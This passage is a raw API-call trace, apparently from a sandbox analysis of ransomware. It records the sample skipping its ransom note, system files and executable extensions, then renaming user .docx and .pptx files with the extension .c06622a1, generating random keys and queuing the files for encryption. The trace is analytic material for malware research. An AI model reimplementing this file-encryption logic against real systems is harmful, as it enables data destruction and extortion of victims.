returned -4 [0148.961] wcslen (_String="exe") returned 0x3 [0148.961] _wcsicmp (_Str1="hlp", _Str2="ico") returned -1 [0148.961] wcslen (_String="hlp") returned 0x3 [0148.961] _wcsicmp (_Str1="icl", _Str2="ico") returned -3 [0148.961] wcslen (_String="icl") returned 0x3 [0148.961] _wcsicmp (_Str1="icns", _Str2="ico") returned -1 [0148.961] wcslen (_String="icns") returned 0x4 [0148.961] _wcsicmp (_Str1="ico", _Str2="ico") returned 0 [0148.962] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7664f60, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7664f60, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7664f60, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.962] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.962] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.962] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0148.962] _wcsicmp (_Str1="backup", _Str2="_private") returned 3 [0148.962] wcslen (_String="backup") returned 0x6 [0148.962] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.962] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.962] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.962] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0148.962] _wcsicmp (_Str1="backup", _Str2="My Shapes") returned -11 [0148.962] wcslen (_String="backup") returned 0x6 [0148.962] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.963] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.991] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0148.991] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd911f520, ftCreationTime.dwHighDateTime=0x1d5adbb, ftLastAccessTime.dwLowDateTime=0x8945ec00, ftLastAccessTime.dwHighDateTime=0x1d59834, ftLastWriteTime.dwLowDateTime=0x8945ec00, ftLastWriteTime.dwHighDateTime=0x1d59834, nFileSizeHigh=0x0, nFileSizeLow=0x15f02, dwReserved0=0x0, dwReserved1=0x0, cFileName="MZDq3p1rpV5vpB.docx", cAlternateFileName="MZDQ3P~1.DOC")) returned 1 [0148.991] _wcsicmp (_Str1="MZDq3p1rpV5vpB.docx", _Str2="README.c06622a1.TXT") returned -5 [0148.991] wcsstr (_Str="MZDq3p1rpV5vpB.docx", _SubStr="README") returned 0x0 [0148.991] _wcsicmp (_Str1="autorun.inf", _Str2="MZDq3p1rpV5vpB.docx") returned -12 [0148.991] wcslen (_String="autorun.inf") returned 0xb [0148.991] _wcsicmp (_Str1="boot.ini", _Str2="MZDq3p1rpV5vpB.docx") returned -11 [0148.991] wcslen (_String="boot.ini") returned 0x8 [0148.991] _wcsicmp (_Str1="bootfont.bin", _Str2="MZDq3p1rpV5vpB.docx") returned -11 [0148.991] wcslen (_String="bootfont.bin") returned 0xc [0148.991] _wcsicmp (_Str1="bootsect.bak", _Str2="MZDq3p1rpV5vpB.docx") returned -11 [0148.991] wcslen (_String="bootsect.bak") returned 0xc [0148.991] _wcsicmp (_Str1="desktop.ini", _Str2="MZDq3p1rpV5vpB.docx") returned -9 [0148.991] wcslen (_String="desktop.ini") returned 0xb [0148.992] _wcsicmp (_Str1="iconcache.db", _Str2="MZDq3p1rpV5vpB.docx") returned -4 [0148.992] wcslen (_String="iconcache.db") returned 0xc [0148.992] _wcsicmp (_Str1="ntldr", _Str2="MZDq3p1rpV5vpB.docx") returned 1 [0148.992] wcslen (_String="ntldr") returned 0x5 [0148.992] _wcsicmp (_Str1="ntuser.dat", _Str2="MZDq3p1rpV5vpB.docx") returned 1 [0148.992] wcslen (_String="ntuser.dat") returned 0xa [0148.992] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MZDq3p1rpV5vpB.docx") returned 1 [0148.992] wcslen (_String="ntuser.dat.log") returned 0xe [0148.992] _wcsicmp (_Str1="ntuser.ini", _Str2="MZDq3p1rpV5vpB.docx") returned 1 [0148.992] wcslen (_String="ntuser.ini") returned 0xa [0148.992] _wcsicmp (_Str1="thumbs.db", _Str2="MZDq3p1rpV5vpB.docx") returned 7 [0148.992] wcslen (_String="thumbs.db") returned 0x9 [0148.992] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0148.992] wcslen (_String="386") returned 0x3 [0148.992] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0148.992] wcslen (_String="adv") returned 0x3 [0148.992] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0148.993] wcslen (_String="ani") returned 0x3 [0148.993] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0148.993] wcslen (_String="bat") returned 0x3 [0148.993] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0148.993] wcslen (_String="bin") returned 0x3 [0148.993] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0148.993] wcslen (_String="cab") returned 0x3 [0148.993] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0148.993] wcslen (_String="cmd") returned 0x3 [0148.993] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0148.993] wcslen (_String="com") returned 0x3 [0148.993] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0148.993] wcslen (_String="cpl") returned 0x3 [0148.993] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0148.993] wcslen (_String="cur") returned 0x3 [0148.993] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0148.993] wcslen (_String="deskthemepack") returned 0xd [0148.994] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0148.994] wcslen (_String="diagcab") returned 0x7 [0148.994] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0148.994] wcslen (_String="diagcfg") returned 0x7 [0148.994] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0148.994] wcslen (_String="diagpkg") returned 0x7 [0148.994] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0148.994] wcslen (_String="dll") returned 0x3 [0148.994] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0148.994] wcslen (_String="drv") returned 0x3 [0148.994] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0148.994] wcslen (_String="exe") returned 0x3 [0148.994] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0148.995] wcslen (_String="hlp") returned 0x3 [0148.995] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0148.995] wcslen (_String="icl") returned 0x3 [0148.995] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0148.995] wcslen (_String="icns") returned 0x4 [0148.995] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0148.995] wcslen (_String="ico") returned 0x3 [0148.995] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0148.995] wcslen (_String="ics") returned 0x3 [0148.995] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0148.995] wcslen (_String="idx") returned 0x3 [0148.995] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0148.995] wcslen (_String="ldf") returned 0x3 [0148.995] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0148.995] wcslen (_String="lnk") returned 0x3 [0148.995] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0148.995] wcslen (_String="mod") returned 0x3 [0148.995] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0148.995] wcslen (_String="mpa") returned 0x3 [0148.995] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0148.995] wcslen (_String="msc") returned 0x3 [0148.996] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0148.996] wcslen (_String="msp") returned 0x3 [0148.996] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0148.996] wcslen (_String="msstyles") returned 0x8 [0148.996] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0148.996] wcslen (_String="msu") returned 0x3 [0148.996] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0148.996] wcslen (_String="nls") returned 0x3 [0148.996] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0148.996] wcslen (_String="nomedia") returned 0x7 [0148.996] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0148.996] wcslen (_String="ocx") returned 0x3 [0148.996] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0148.996] wcslen (_String="prf") returned 0x3 [0148.996] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0148.996] wcslen (_String="ps1") returned 0x3 [0148.996] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0148.996] wcslen (_String="rom") returned 0x3 [0148.996] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0148.996] wcslen (_String="rtp") returned 0x3 [0148.997] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0148.997] wcslen (_String="scr") returned 0x3 [0148.997] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0148.997] wcslen (_String="shs") returned 0x3 [0148.997] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0148.997] wcslen (_String="spl") returned 0x3 [0148.997] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0148.997] wcslen (_String="sys") returned 0x3 [0148.997] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0148.997] wcslen (_String="theme") returned 0x5 [0148.997] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0148.997] wcslen (_String="themepack") returned 0x9 [0148.997] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0148.997] wcslen (_String="wpx") returned 0x3 [0148.997] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0148.997] wcslen (_String="lock") returned 0x4 [0148.997] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0148.997] wcslen (_String="key") returned 0x3 [0148.997] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0148.997] wcslen (_String="hta") returned 0x3 [0148.997] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0148.998] wcslen (_String="msi") returned 0x3 [0148.998] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0148.998] wcslen (_String="pdb") returned 0x3 [0148.998] _wcsicmp (_Str1="sql", _Str2="docx") returned 15 [0148.998] wcslen (_String="sql") returned 0x3 [0148.998] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0148.998] wcslen (_String="sqlite") returned 0x6 [0148.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.998] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.998] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.998] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.998] wcscpy (in: _Dest=0x44d00d0, _Source="MZDq3p1rpV5vpB.docx" | out: _Dest="MZDq3p1rpV5vpB.docx") returned="MZDq3p1rpV5vpB.docx" [0148.998] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx", dwFileAttributes=0x80) returned 1 [0148.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzdq3p1rpv5vpb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0148.999] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.999] ReadFile (in: hFile=0x66c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.000] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xed2e9fb3 [0149.000] RtlComputeCrc32 (PartialCrc=0x9fb3, Buffer=0x3feb74, Length=0x80) returned 0xacb85da1 [0149.000] RtlComputeCrc32 (PartialCrc=0x5da1, Buffer=0x3feb74, Length=0x80) returned 0x45a145d5 [0149.000] RtlComputeCrc32 (PartialCrc=0x45d5, Buffer=0x3feb74, Length=0x80) returned 0x5b1f6c9d [0149.000] RtlComputeCrc32 (PartialCrc=0x6c9d, Buffer=0x3feb74, Length=0x80) returned 0x2e3bd8eb [0149.000] CloseHandle (hObject=0x66c) returned 1 [0149.000] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.000] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx" [0149.000] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx") returned 0x3f [0149.000] wcscpy (in: _Dest=0x44e00fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.000] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzdq3p1rpv5vpb.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzdq3p1rpv5vpb.docx.c06622a1"), dwFlags=0x8) returned 1 [0149.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MZDq3p1rpV5vpB.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzdq3p1rpv5vpb.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0149.004] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.004] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d8fad59 [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x98ea7cf [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4cd43b74 [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63916cbc [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x133f7244 [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76e66dbe [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x30922a82 [0149.012] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59a6a988 [0149.015] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x4c8a2e81 [0149.015] RtlComputeCrc32 (PartialCrc=0x2e81, Buffer=0x2f30094, Length=0x80) returned 0xd8ed3f2 [0149.015] RtlComputeCrc32 (PartialCrc=0xd3f2, Buffer=0x2f30094, Length=0x80) returned 0xd51996a4 [0149.016] RtlComputeCrc32 (PartialCrc=0x96a4, Buffer=0x2f30094, Length=0x80) returned 0x55752009 [0149.016] RtlComputeCrc32 (PartialCrc=0x2009, Buffer=0x2f30094, Length=0x80) returned 0x4f0252b8 [0149.016] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0149.016] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.016] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.017] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd02e2910, ftCreationTime.dwHighDateTime=0x1d5da07, ftLastAccessTime.dwLowDateTime=0x6c83cb70, ftLastAccessTime.dwHighDateTime=0x1d5e080, ftLastWriteTime.dwLowDateTime=0x6c83cb70, ftLastWriteTime.dwHighDateTime=0x1d5e080, nFileSizeHigh=0x0, nFileSizeLow=0x71f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="NS-PI08cl E0CZ0AD.pptx", cAlternateFileName="NS-PI0~1.PPT")) returned 1 [0149.017] _wcsicmp (_Str1="NS-PI08cl E0CZ0AD.pptx", _Str2="README.c06622a1.TXT") returned -4 [0149.017] wcsstr (_Str="NS-PI08cl E0CZ0AD.pptx", _SubStr="README") returned 0x0 [0149.017] _wcsicmp (_Str1="autorun.inf", _Str2="NS-PI08cl E0CZ0AD.pptx") returned -13 [0149.017] wcslen (_String="autorun.inf") returned 0xb [0149.017] _wcsicmp (_Str1="boot.ini", _Str2="NS-PI08cl E0CZ0AD.pptx") returned -12 [0149.017] wcslen (_String="boot.ini") returned 0x8 [0149.017] _wcsicmp (_Str1="bootfont.bin", _Str2="NS-PI08cl E0CZ0AD.pptx") returned -12 [0149.017] wcslen (_String="bootfont.bin") returned 0xc [0149.017] _wcsicmp (_Str1="bootsect.bak", _Str2="NS-PI08cl E0CZ0AD.pptx") returned -12 [0149.018] wcslen (_String="bootsect.bak") returned 0xc [0149.018] _wcsicmp (_Str1="desktop.ini", _Str2="NS-PI08cl E0CZ0AD.pptx") returned -10 [0149.018] wcslen (_String="desktop.ini") returned 0xb [0149.018] _wcsicmp (_Str1="iconcache.db", _Str2="NS-PI08cl E0CZ0AD.pptx") returned -5 [0149.018] wcslen (_String="iconcache.db") returned 0xc [0149.018] _wcsicmp (_Str1="ntldr", _Str2="NS-PI08cl E0CZ0AD.pptx") returned 1 [0149.018] wcslen (_String="ntldr") returned 0x5 [0149.018] _wcsicmp (_Str1="ntuser.dat", _Str2="NS-PI08cl E0CZ0AD.pptx") returned 1 [0149.018] wcslen (_String="ntuser.dat") returned 0xa [0149.018] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NS-PI08cl E0CZ0AD.pptx") returned 1 [0149.018] wcslen (_String="ntuser.dat.log") returned 0xe [0149.018] _wcsicmp (_Str1="ntuser.ini", _Str2="NS-PI08cl E0CZ0AD.pptx") returned 1 [0149.018] wcslen (_String="ntuser.ini") returned 0xa [0149.018] _wcsicmp (_Str1="thumbs.db", _Str2="NS-PI08cl E0CZ0AD.pptx") returned 6 [0149.018] wcslen (_String="thumbs.db") returned 0x9 [0149.018] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0149.019] wcslen (_String="386") returned 0x3 [0149.019] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0149.019] wcslen (_String="adv") returned 0x3 [0149.019] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0149.019] wcslen (_String="ani") returned 0x3 [0149.019] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0149.019] wcslen (_String="bat") returned 0x3 [0149.019] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0149.019] wcslen (_String="bin") returned 0x3 [0149.019] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0149.019] wcslen (_String="cab") returned 0x3 [0149.019] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0149.019] wcslen (_String="cmd") returned 0x3 [0149.019] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0149.019] wcslen (_String="com") returned 0x3 [0149.019] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0149.019] wcslen (_String="cpl") returned 0x3 [0149.019] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0149.020] wcslen (_String="cur") returned 0x3 [0149.020] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0149.020] wcslen (_String="deskthemepack") returned 0xd [0149.020] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0149.020] wcslen (_String="diagcab") returned 0x7 [0149.020] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0149.020] wcslen (_String="diagcfg") returned 0x7 [0149.020] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0149.020] wcslen (_String="diagpkg") returned 0x7 [0149.020] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0149.020] wcslen (_String="dll") returned 0x3 [0149.020] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0149.020] wcslen (_String="drv") returned 0x3 [0149.020] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0149.020] wcslen (_String="exe") returned 0x3 [0149.020] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0149.020] wcslen (_String="hlp") returned 0x3 [0149.020] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0149.020] wcslen (_String="icl") returned 0x3 [0149.020] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0149.020] wcslen (_String="icns") returned 0x4 [0149.020] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0149.021] wcslen (_String="ico") returned 0x3 [0149.021] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0149.021] wcslen (_String="ics") returned 0x3 [0149.021] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0149.021] wcslen (_String="idx") returned 0x3 [0149.021] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0149.021] wcslen (_String="ldf") returned 0x3 [0149.021] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0149.021] wcslen (_String="lnk") returned 0x3 [0149.021] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0149.021] wcslen (_String="mod") returned 0x3 [0149.021] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0149.021] wcslen (_String="mpa") returned 0x3 [0149.021] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0149.021] wcslen (_String="msc") returned 0x3 [0149.021] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0149.021] wcslen (_String="msp") returned 0x3 [0149.021] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0149.021] wcslen (_String="msstyles") returned 0x8 [0149.021] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0149.021] wcslen (_String="msu") returned 0x3 [0149.021] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0149.022] wcslen (_String="nls") returned 0x3 [0149.022] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0149.022] wcslen (_String="nomedia") returned 0x7 [0149.022] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0149.022] wcslen (_String="ocx") returned 0x3 [0149.022] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0149.022] wcslen (_String="prf") returned 0x3 [0149.022] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0149.022] wcslen (_String="ps1") returned 0x3 [0149.022] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0149.022] wcslen (_String="rom") returned 0x3 [0149.022] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0149.022] wcslen (_String="rtp") returned 0x3 [0149.022] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0149.022] wcslen (_String="scr") returned 0x3 [0149.022] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0149.022] wcslen (_String="shs") returned 0x3 [0149.022] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0149.022] wcslen (_String="spl") returned 0x3 [0149.022] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0149.022] wcslen (_String="sys") returned 0x3 [0149.023] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0149.023] wcslen (_String="theme") returned 0x5 [0149.023] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0149.023] wcslen (_String="themepack") returned 0x9 [0149.023] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0149.023] wcslen (_String="wpx") returned 0x3 [0149.023] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0149.023] wcslen (_String="lock") returned 0x4 [0149.023] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0149.023] wcslen (_String="key") returned 0x3 [0149.023] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0149.023] wcslen (_String="hta") returned 0x3 [0149.023] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0149.023] wcslen (_String="msi") returned 0x3 [0149.023] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0149.023] wcslen (_String="pdb") returned 0x3 [0149.023] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0149.023] wcslen (_String="sql") returned 0x3 [0149.023] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0149.023] wcslen (_String="sqlite") returned 0x6 [0149.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.024] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.024] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.024] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.024] wcscpy (in: _Dest=0x44d00d0, _Source="NS-PI08cl E0CZ0AD.pptx" | out: _Dest="NS-PI08cl E0CZ0AD.pptx") returned="NS-PI08cl E0CZ0AD.pptx" [0149.024] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx", dwFileAttributes=0x80) returned 1 [0149.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 